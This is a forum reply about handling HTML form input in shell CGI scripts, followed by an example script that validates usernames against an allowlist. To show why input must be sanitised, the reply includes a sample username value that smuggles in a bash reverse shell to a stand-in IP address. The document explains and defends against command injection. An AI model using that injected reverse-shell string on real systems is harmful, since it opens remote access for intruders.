Quote:
Originally Posted by robertkwild
so that's a no then on doing it via html form
I'm rather sure you can process form data via a shell script. I've done CGI scripts in shell before but they were much simpler and it was a long, long time ago. However, that's the kind of thing you really ought to turn to Perl for.
The point that I see several trying to make, and I hope it drives home, is that you cannot and must not in any way trust the data that arrives in your script from the web server. You have to severely process it so that only ASCII is left, if anything. And even then, only a subset can be allowed.
For example you don't want the following line
Code:
useradd -g $group -d $dir/$user -s /sbin/nologin $user
to ever be in a situation where someone can set $user equal to "budroe; bash -i >& /dev/tcp/192.0.2.233/8282 0>&1;" or anything else malicious.
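One way to apply the "only a subset of ASCII" advice from the post above in a shell CGI script, as an added example that is not part of the original post. The group name, base directory and the `USERADD` override are assumptions made for illustration.

```shell
#!/bin/sh
# Added example, not from the original post. GROUP, BASEDIR and the
# USERADD override are hypothetical values chosen for illustration.
LC_ALL=C; export LC_ALL          # make [a-z] mean ASCII a-z only

GROUP=webusers                   # fixed by the script, never taken from the form
BASEDIR=/home
USERADD=${USERADD:-useradd}      # overridable so the logic can be dry-run

# Succeed only for 1-32 bytes of [a-z0-9_-] that start with a letter or "_".
# Anything else (spaces, ";", "/", "&", ">", uppercase, a leading "-") fails.
valid_username() {
    case $1 in
        ''|[!a-z_]*|*[!a-z0-9_-]*) return 1 ;;
    esac
    [ "${#1}" -le 32 ]
}

# Validate first, then pass every value as its own quoted argument so the
# shell never re-parses or word-splits the form data.
create_user() {
    if ! valid_username "$1"; then
        echo "rejected username" >&2
        return 1
    fi
    "$USERADD" -g "$GROUP" -d "$BASEDIR/$1" -s /sbin/nologin "$1"
}
```

The check is an allowlist: it names the characters that are permitted and rejects everything else, rather than trying to strip known-bad characters.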